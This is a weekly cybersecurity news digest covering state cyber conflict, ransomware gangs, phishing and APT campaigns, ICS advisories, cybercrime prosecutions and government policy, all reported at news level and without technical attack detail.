The still-unformed laws of conflict in cyberspace.
One of the central jus in bello concerns the laws of armed conflict seek to address is the distinction between combatant and noncombatant, between soldier and civilian. The shadow, quasi-cyberwar between Iran and Israel seems not only to be intensifying, but also, according to the New York Times (which attributes its conclusions to anonymous US intelligence sources), may be entering a phase in which both sides seem willing to hit clearly civilian targets. An attack that disrupted Iranian fuel stations and the doxing of Israeli participants in an LGBTQ online community both represented themselves as hacktivists' work, but both incidents seem to be the work of fronts run from Jerusalem and Tehran.
Meta reports on adversarial networks.
Facebook's parent Meta this week released its end-of-year Adversarial Threat Report. It concentrates on what Meta calls "Coordinated Inauthentic Behavior (CIB), Brigading and Mass Reporting." Coordinated inauthentic behavior is familiar, but brigading and mass reporting deserve some explanation.
Brigading involves an "adversarial network" whose participants cooperate "to mass comment, mass post or engage in other types of repetitive mass behaviors to harass others or silence them,” which sounds like trolling scaled to an industrial size.
Mass reporting, also characterized as involving an adversarial network, occurs when "people work together to mass-report an account or content to get it incorrectly taken down from our platform." That is, people combine to falsely allege violations of policy in an attempt to get someone banned from Facebook or any other Meta platform. The “reporting” in this case is reporting in the sense of diming someone out to the platform.
Meta took down four coordinated inauthentic behavior networks in China, Palestine, Poland, and Belarus. One network in Italy and France was disabled for brigading, and one network in Vietnam was removed for mass reporting. The brigading in Italy and France Meta attributes to a conspiracy movement, not obviously connected to any government. Matters are different with the mass reporting activity, which seemed to have been coordinated by the government of Vietnam. The coordinated inauthenticity also looks government-directed, but it's worth noting that governments, which remain responsible for a good fraction of the adversarial networks Facebook (and its parent Meta) are concerned about, are now also outsourcing disinformation operations to contractors. Not only may this make economic sense, but it also affords a degree of deniability and greater opportunities for amplification of messaging by state-controlled media.
Ransomware actor rebrands.
Mandiant on Monday released a report on Sabbath (the gang refers to itself by the Leet numeronym "54BB47h"), which opened a ransomware "shaming" site on October 21st. Sabbath isn't actually new. Mandiant researchers have determined, on the basis of the CobaltStrike BEACON infrastructure Sabbath uses, that it is in fact a rebranding of a ransomware affiliate operation that's earlier gone by the names of "Eruption" and, more recently, "Arcane." Mandiant tracks the gang as UNC2190, and says it's made a specialty of targeting "critical infrastructure including education, health, and natural resources in the United States and Canada."
Pharmaceutical company sustains ransomware attack.
Supernus Pharmaceuticals on Friday filed an 8K with the US Securities and Exchange Commission disclosing that it sustained a ransomware attack that began in mid-November. The company is cautiously optimistic, saying that it contained the damage without disruption to its operations and isn't paying the ransom, but that it can't rule out reattacks or malicious use of stolen data. SecurityWeek says that the Hive ransomware gang claimed responsibility on Thanksgiving, anticipating the 8K by a day.
Smishing campaign targets Iranians.
The Hill reports that a financially-motivated smishing campaign is active against Iranian Android users. The campaign was discovered by researchers at Check Point, who stated, "In the midst of major cyber attacks targeting the general population of Iran, Check Point Research (CPR) sees another significant cyber attack campaign, where socially engineered SMS messages are being used to target Iran’s citizens. Designed to Impersonate the Iranian government, the fraudulent SMS messages lure victims into downloading malicious Android applications related to official Iranian services, such as the Iranian Electronic Judicial Services. In turn, these malicious applications convince their victims to offer up sensitive data: credit card credentials and two-factor authentication codes. From there, the threat actors go on to perform unauthorized withdrawals from the credit card accounts of their victims."
Check Point estimates that an average of US$1,000 to $2,000 was stolen from each victim.
SideCopy targets Afghanistan.
Malwarebytes has released additional information on SideCopy, a Pakistani APT that Facebook last month had identified as prospecting personnel of the former, pre-Taliban government of Afghanistan. SideCopy used new variants of the Stealer data-theft tool; the information it collected included "access to government portals, Facebook, Twitter and Google credentials, banking information, and password-protected documents."
Malwarebytes notes, "The SideCopy APT was able to steal several Office documents and databases associated with the Government of Afghanistan. As an example, the threat actor exfiltrated Diplomatic Visa and Diplomatic ID cards from the Ministry of Foreign Affairs of Afghanistan database, as well as the Asset Registration and Verification Authority database belonging to the General Director of Administrative Affairs of Government of Afghanistan. They also were able to exfiltrate the ID cards of several Afghani government officials. The exfiltrated documents contain names, numbers and email addresses associated with government officials. It is possible that they have been already targeted by the actor or will be the future targets of this actor. There are also some confidential letters that we think the actor is planning to use for future lures."
State-sponsored actors using RTF template injection.
Proofpoint describes an attack technique recently favored by state agencies: RTF template injection. The APTs using the technique are associated with China, Russia, and India. The approach itself isn't new, but its ready availability, effectiveness, and ease-of-use have made it attractive to APTs. Proofpoint expects to see the usual trickle-down effect, with criminal gangs following the trail blazed by intelligence services.
Proofpoint stated, "Template injection RTF files attributable to the APT group DoNot Team, that has historically been suspected of being aligned with Indian-state interests, were identified through July 8, 2021. RTF files likely attributable to a Chinese-related APT actor were identified as recently as September 29, 2021, targeting entities with ties to Malaysian deep water energy exploration. Following this initial adoption period, the APT actor Gamaredon, which has been linked to the Russian Federal Security Service (FSB), was later observed utilizing RTF template injection files in campaigns that leveraged Ukrainian governmental file lures on October 5, 2021."
North Korean threat actors continue posing as job recruiters.
Among the revelations of last week's Google Threat Horizons report is an account of how North Korean operators approached South Korean targets online by posing as Samsung recruiters. The report stated, "TAG observed a North Korean government-backed attacker group that previously targeted security researchers posing as recruiters at Samsung and sending fake job opportunities to employees at multiple South Korean information security companies that sell anti-malware solutions. The emails included a PDF allegedly claiming to be of a job description for a role at Samsung; however, the PDFs were malformed and did not open in a standard PDF reader. When targets replied that they could not open the job description, attackers responded with a malicious link to malware purporting to be a ‘Secure PDF Reader’ stored in Google Drive which has now been blocked."
Patch news.
CISA released seven industrial control system advisories on Tuesday. The affected products, for which patches and mitigations are available, include Xylem Aanderaa GeoView, Mitsubishi Electric MELSEC and MELIPC Series, Delta Electronics CNCSoft, Johnson Controls CEM Systems AC2000, Hitachi Energy Retail Operations and CSB Software, InHand Networks IR615 Router, and Multiple RTOS. On Thursday the agency published eight more: Schneider Electric SESU, Johnson Controls Entrapass, Distributed Data Systems WebHMI, Hitachi Energy RTU500 series BCI, Hitachi Energy Relion 670/650/SAM600-IO, Hitachi Energy APM Edge, Hitachi Energy PCM600 Update Manager, and Hitachi Energy RTU500 series.
Crime and punishment.
Aleksandr Grichishkin, one of the founders and the effective leader of a bulletproof hosting service that catered to cyber gangs, has been sentenced by the US District Court for the Eastern District of Michigan, Southern Division, to a term of five years on a RICO beef. Mr. Grichishkin took a guilty plea to one count of Conspiracy to Engage in a Racketeer Influenced Corrupt Organization. His co-defendants, who also pleaded guilty, were sentenced earlier. The US Attorney’s sentencing memorandum outlines the services Grichishkin’s operation provided. He and his colleagues were in the infrastructure business, and delivered the IP addresses, domains, and servers their gangland customers used, as BleepingComputer lists them, “to distribute malware, host phishing kits, breach targets' networks, build botnets, and steal banking credentials.” The malware they supported forms a familiar list: Zeus, SpyEye, Citadel, and Blackhole. The Financial Services Information Sharing and Analysis Center, FS-ISAC, informed the court that SpyEye and Zeus alone cost banks about $111 million in 2011 alone, and that FS-ISAC regards that figure as a low estimate.
The US Department of Justice has also announced the indictment and arrest of Mr. Nickolas Sharp, formerly employed by Ubiquiti Networks, on four counts of computer-related crime. The Verge has a useful summary of the case. Back in January Ubiquiti, which makes prosumer routers and access points, notified users that it had sustained a data breach in the course of which unauthorized parties may have accessed company information. In March a whistleblower told media outlets that matters were far worse than Ubiquiti had let on, and that it had covered up a “catastrophic” data breach. That whistleblower was apparently Mr. Sharp, and, if the Fed’s indictment is borne out at trial (since of course Mr. Sharp is entitled to a presumption of innocence) he was not only responsible for the initial data breach itself, but also for using his whistleblowing to ratchet up extortion pressure on the company.
TASS is authorized to disclose that Russian President Vladimir Putin, noting the increased rate at which Russia itself experiences cybercrime, "We suffer from this ourselves. We understand the importance of joint work on this track and we will be doing it." So compare and contrast the following three cases.
First, consider a Daily Mail story: “REvil 'super-hacker' wanted by FBI for 'using ransomware to fleece millions of dollars' from Americans is unmasked by DailyMail.com in his plush hideout in Siberia as Kremlin turns blind eye,” reads the Mail’s unusually detailed screamer. The tabloid’s talking about Mr. Yeveniy Polyanin, a Russian national 28 years young, whom we’ve heard of before as being wanted by US authorities for his alleged role in the REvil gang. The Mail’s newshounds have tracked him to “a $380,000 home in the Siberian city of Barnaul, where his wife, Sofia, openly runs a social media baking business.” The Mail adds that Mr. Polyanin has been “seen in Barnaul driving a $74,000 Toyota Land Cruiser,” and that he owns another car worth maybe a cool $108,000. It would be a stretch to characterize him as being even nominally on the lam. This lifestyle sounds more provincial upper-middle class than big-time crime lord (maybe upper-upper middle class, given that he’s living in Siberia), and it’s certainly a far cry from living on a yacht in the Black Sea and collecting gold chains and exotic cats, but the Mail is absolutely on point when it says it’ll be a hot winter in Chelyabinsk before Mr. Polyanin or his colleagues are extradited to face American law.
Second, consider an actual Russian prosecution. Bloomberg Businessweek describes Russia's ongoing treason prosecution of Group-IB executive Ilya Sachkov. The Kremlin believes him responsible for tipping the US off to Fancy Bear's election-influence activities. Conviction will get him twenty years in a labor camp.
And third, contrast the outcome of another trial in Russia, where a Russian court has passed sentence on Maxim Zhukov the leading role he played in coding for the FIN7 gang. He received, the Record reports, a one-year suspended sentence and a year's probation. That's less than the time Sachkov has already served awaiting trial.
Lest the Americans get above themselves and start feeling too smug when standing next to the Russians in this particular line-up of risible prosecutions, there's more in the (alas) continuing case of responsible disclosure in the US state of Missouri. The Saint Louis Post-Dispatch updates the discreditable episode in which the Governor of Missouri denounced one of the paper's reporters as a criminal hacker for disclosing the discovery of an exposed database to the Department of Elementary and Secondary Education. Apparently the Department had prepared a statement thanking the reporter for bringing the matter to their attention; that statement was quashed and preempted by the Governor's call for prosecution. Come on, Show Me State: show us something.
Policies, procurements, and agency equities.
Israel's government has restricted the sale of intercept tools (notably NSO Group's Pegasus software) to just thirty-seven countries, down from the previous one-hundred two, Calcalist reports.
Just before the Thanksgiving holiday the US Commerce Department added twenty-eight organizations to its Entity List of sanctioned groups. The countries most directly affected are China (for a range of technologies, including quantum computing with military applications), Pakistan (for ballistic missile proliferation), and Russia (for military R&D).
Tensions between Russia and Ukraine remain high. The US embassy in Kiev last week reiterated warnings to travelers urging them to avoid the Crimea and Ukraine's eastern regions. The AP reported Saturday that Ukrainian President Zelensky said Kiev's intelligence services had uncovered Russian plans for a coup d'état in Ukraine within the week. Cyber operations can be expected to keep pace with the conflict.
A report the US Government Accountability Office (GAO) delivered to Congress on Thursday argues that US critical infrastructure remains at serious risk. The report complains of a lack of a comprehensive cybersecurity strategy, and concludes, "the federal government needs to move with a greater sense of urgency in response to the serious cybersecurity threats faced by the nation and its critical infrastructure."
CISA has named the first members of its Cybersecurity Advisory Committee (the “CSAC”). The agency describes the Advisory Committee as “comprised of the nation’s leading experts on cybersecurity, technology, risk management, privacy, and resilience. They bring a diverse set of experiences and perspectives and will empanel a set of subcommittees focused on addressing key focus areas.” The appointments just announced represent the first twenty-three members. The CSAC may ultimately have up to thirty-five members.
The Advisory Committee was established in June of this year, and was designed to bring the CISA Director advice on cybersecurity from the perspective not only of industry, but also of state, local, and tribal governments. CISA says that “Committee members—with subject matter expertise in various critical infrastructure sectors—participate in the development, refinement, and implementation of recommendations, policies, programs, planning, and training pertaining to CISA’s cybersecurity mission.” The CSAC will also form subcommittees as the CISA Director decides. Subcommittees would study special topics of importance to the agency’s mission.